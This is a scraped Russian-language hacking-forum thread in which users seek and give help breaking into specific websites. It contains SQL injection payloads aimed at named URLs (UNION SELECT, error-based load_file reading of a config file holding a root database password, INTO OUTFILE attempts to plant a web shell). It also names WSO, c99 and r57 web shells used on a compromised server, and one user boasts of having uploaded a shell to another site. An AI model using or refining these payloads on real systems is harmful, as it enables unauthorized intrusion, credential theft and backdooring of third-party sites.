shadowrun, попробуй так http://ironmiketyson.ru/article_read.php?id=1+/*!union*/+/*!select*/+1+--+ сам не могу проверить, проксика нет
Нашёл очень лакомую Time-Based скулю. Подскажите нормальный софт, ориентированный именно на неё ?? З.Ы. Канал стабильный, без скачков.
Хех. Цитирую сам себя уже. Ну в общем нашёл я нужную утилиту. Называется Marathon Tool Специально заточена под Time-Based SQL Сайт автора тут
Прошу помощи! Как всегда начну с фразы: "Уважаемые знатоки!" Есть сайт: 1)file_priv=y 2)mq=off 3) есть /test.php 3) Доступ 4х администраторов в админку есть, доступ в админку www.site.ru/cms) - так он не пускает но если через www.site.ru/index.php/cms тогда пускает но не выполняются скрипты. 4) прочитан config.ini есть пароль root к базе. Но путь до самой базы не известен. Теперь самое интересное: config.ini прочитан так: index/***/id/*21'+or+1+group+by+concat(mid(load_file(0xздесьхеш),50,163),floor(rand(0)*2))+having+min(0)+or+1+--+ запрос на запись делаем так: /image/*****/id/*53+and+(select+'+into+outfile+')+!=1 результат - ошибка но через пару часов при /image/*****/id/*53 без инъекта появляется следущее: яШяаJFIFHHяб4ExifII*bj(1r2Ћi‡¤шЂь 'Ђь 'Adobe Photoshop CS2 Windows2011:07:05 16:16:46†’Ъ яя Ж zLEAD Technologies Inc. V1.01FN(VЦHHяШяаJFIFHHянAdobe_CMяоAdobedЂяЫ„ яАc "яЭ яД? 3!1AQa"qЃ2‘Ў и т.д... ВНИМАНИЕ ВОПРОС! На сколько высока вероятность то что into outfile не получится (доходчиво: шелл не зальется?) P.S. возможно не правильный запрос но если запрос сделать так /image/*****/id/*53+and+'select+'+into+outfile+'+!=1' то ошибка такова: Invalid query: File ' !=1' already exists Спасибо за внимание надеюсь на коментарии, может у кого-то похожая ситуация была.
На линьке WSO. Нужно из шелла попасть в одну директорию, но в ней содержится оочень много файлов одного расширения и поэтому, при заходе в директорию отображается пустая страница. Как исправить это недоразумение? Использовал другие шеллы: с99, r57 и т.д. Результат один и он не устраивает. Надеюсь вопрос корректно составлен.
2lion-art по твоим описаниям залить шелл как два пальца об асфальт но... спали в ПМ линк посмотрю и отпишусь, так как трудно что то тут посоветовать а то за каждый шаг будет плодится еще вопросы.
Троль! Во первых, те не сказал, что залить, во вторых - ты даже не сказал, где админка. Вот из-за этого не буду тебе давать шелл...
Code: http://www.magiccamp.com.ua/robots.txt братюнь админку помочь найти? залить мочой прямо на сервак он просил естессна,не шелл же. upd:сууука,тролль пишется с двумя л ууумница=*
Ты может троль и с двумя "л", я шелл залил, но ему давать не буду. P.S robots.txt и без тебя врубить догадался.
есть таблица с названием - 5 как удалить оттуда запись с id=4 ? вот запрос на вывод данных: но удалить не получается, уже перепробовал всё что можно, например: что я делаю не так?